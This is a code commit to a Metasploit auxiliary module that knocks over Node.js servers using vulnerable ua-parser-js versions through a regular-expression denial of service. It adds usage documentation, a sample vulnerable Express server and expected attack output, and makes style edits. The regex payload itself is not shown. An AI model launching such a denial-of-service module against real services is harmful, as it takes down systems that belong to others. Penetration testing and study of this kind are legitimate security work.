Changes as per comments

A few things were changed as per the PR comments:
1) The module title was reworded
2) The module description was multi-lined
3) Negative logic was rewritten to use 'unless'
4) Strings which did not require interpolation were rewritten
5) Documentation markdown was added.

Author: Nicholas Starke

documentation/modules/auxiliary/dos/http/ua_parser_js_redos.md

@@ -0,0 +1,62 @@
+## Vulnerable Application
+This auxiliary module exploits a Regular Expression Denial of Service vulnerability
+in the npm module `ua-parser-js`.  Versions before 0.7.16 are vulnerable.  
+Any application that uses a vulnerable version of this module and calls the `getOS`
+or `getResult` functions will be vulnerable to this module.  An example server is provided
+below.
+
+```
+npm i [email protected]
+```
+
+## Verification Steps
+
+Example steps in this format (is also in the PR):
+1. Create a new directory for test application.
+2. Copy below example server into test application directory as `server.js`.
+3. Run `npm i express` to install express in the test application directory.
+4. To test vulnerable versions of the module, run `npm i [email protected]` to install a vulnerable version of ua-parser-js.
+5. To test non-vulnerable versions of the module, run `npm i ua-parser-js` to install the latest version of ua-parser-js.
+6. Once all dependencies are installed, run the server with `node server.js`.
+7. Open up a new terminal.
+8. Start msfconsole.
+9. `use auxiliary/dos/http/ua_parser_js_redos`.
+10. `set RHOSTS <IP>`.
+11. `run`.
+12. In vulnerable installations, Module should have positive output and the test application should accept no further requests.
+13. In non-vulnerable installations, module should have negative output and the test application should accept further requests.
+
+## Scenarios
+
+### ua-parser-js npm module version 0.7.15
+
+Expected output for successful exploitation:
+
+```
+[*] Testing Service to make sure it is working.
+[*] Test request successful, attempting to send payload
+[*] Sending ReDoS request to 192.168.3.24:3000.
+[*] No response received from 192.168.3.24:3000, service is most likely unresponsive.
+[*] Testing for service unresponsiveness.
+[+] Service not responding.
+[*] Auxiliary module execution completed
+```
+
+### Example Vulnerable Application
+
+```
+// npm i express
+// npm i [email protected] (vulnerable)
+// npm i ua-parser-js (non-vulnerable)
+
+const express = require('express')
+const uaParser = require('ua-parser-js');
+const app = express()
+
+app.get('/', (req, res) => {
+  var parser = new uaParser(req.headers['user-agent']);
+  res.end(JSON.stringify(parser.getResult()));
+});
+
+app.listen(3000, '0.0.0.0', () => console.log('Example app listening on port 3000!'))
+```

modules/auxiliary/dos/http/ua_parser_js_redos.rb

@@ -9,12 +9,17 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'           => 'ua-parser-js npm module - Regular Expression Denial of Service',
+      'Name'           => 'ua-parser-js npm module ReDoS',
       'Description'    => %q{
-        This module exploits a Regular Expression Denial of Service vulnerability in the npm module "ua-parser-js". Server-side applications that use "ua-parser-js" for parsing the browser user-agent string will be vulnerable if they call the "getOS" or "getResult" functions. This vulnerability was fixed as of version 0.7.16.
+        This module exploits a Regular Expression Denial of Service vulnerability
+        in the npm module "ua-parser-js". Server-side applications that use
+        "ua-parser-js" for parsing the browser user-agent string will be vulnerable
+        if they call the "getOS" or "getResult" functions. This vulnerability was
+        fixed as of version 0.7.16.
       },
       'References'     =>
         [
+          ['URL', 'https://github.com/faisalman/ua-parser-js/commit/25e143ee7caba78c6405a57d1d06b19c1e8e2f79'],
           ['CWE', '400'],
         ],
       'Author'         =>
@@ -31,7 +36,7 @@ def initialize
   end
 
   def run
-    if !test_service
+    unless test_service
       fail_with(Failure::Unreachable, "#{peer} - Could not communicate with service.")
     else
       trigger_redos
@@ -66,36 +71,36 @@ def trigger_redos
 
   def test_service_unresponsive
     begin
-      print_status("Testing for service unresponsiveness.")
+      print_status('Testing for service unresponsiveness.')
 
       res = send_request_cgi({
         'uri' => '/' + Rex::Text.rand_text_alpha(8),
         'method' => 'GET'
       })
 
       if res.nil?
-        print_good("Service not responding.")
+        print_good('Service not responding.')
       else
-        print_error("Service responded with a valid HTTP Response; ReDoS attack failed.")
+        print_error('Service responded with a valid HTTP Response; ReDoS attack failed.')
       end
     rescue ::Rex::ConnectionRefused
-      print_error("An unknown error occurred.")
+      print_error('An unknown error occurred.')
     rescue ::Timeout::Error
-      print_good("HTTP request timed out, most likely the ReDoS attack was successful.")
+      print_good('HTTP request timed out, most likely the ReDoS attack was successful.')
     end
   end
 
   def test_service
     begin
-      print_status("Testing Service to make sure it is working.")
+      print_status('Testing Service to make sure it is working.')
 
       res = send_request_cgi({
         'uri' => '/' + Rex::Text.rand_text_alpha(8),
         'method' => 'GET'
       })
 
       if !res.nil? && (res.code == 200 || res.code == 404)
-        print_status("Test request successful, attempting to send payload")
+        print_status('Test request successful, attempting to send payload')
         return true
       else
         return false